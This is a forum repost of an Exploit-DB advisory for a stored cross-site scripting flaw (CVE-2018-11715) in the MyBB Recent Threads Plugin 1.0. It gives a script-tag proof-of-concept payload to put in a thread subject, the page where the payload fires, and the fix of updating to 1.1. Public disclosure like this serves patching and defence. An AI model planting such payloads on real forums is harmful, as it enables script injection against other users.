Exploit MyBB Recent Threads Plugin 1.0 - Cross-Site Scripting

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
44833
Проверка EDB
  1. Пройдено
Автор
0XB9
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2018-11715
Дата публикации
2018-06-05
MyBB Recent Threads Plugin 1.0 - Cross-Site Scripting
Код:
# Exploit Title: MyBB Recent Threads Plugin v1.0 - Cross-Site Scripting
# Date: 6/2/2018
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://community.mybb.com/mods.php?action=view&pid=842
# Version: 1.0
# Tested on: Ubuntu 18.04
# CVE: CVE-2018-11715


1. Description:
Creates a page that shows threads that the user has posted in when they have unread replies.

 

2. Proof of Concept:

- Create or reply to a thread with the following subject  <script>alert('XSS')</script> 
- When someone replies to the thread you will see the alert here /misc.php?action=myrecentthreads



3. Solution:
Update to 1.1
 
Источник
www.exploit-db.com

Похожие темы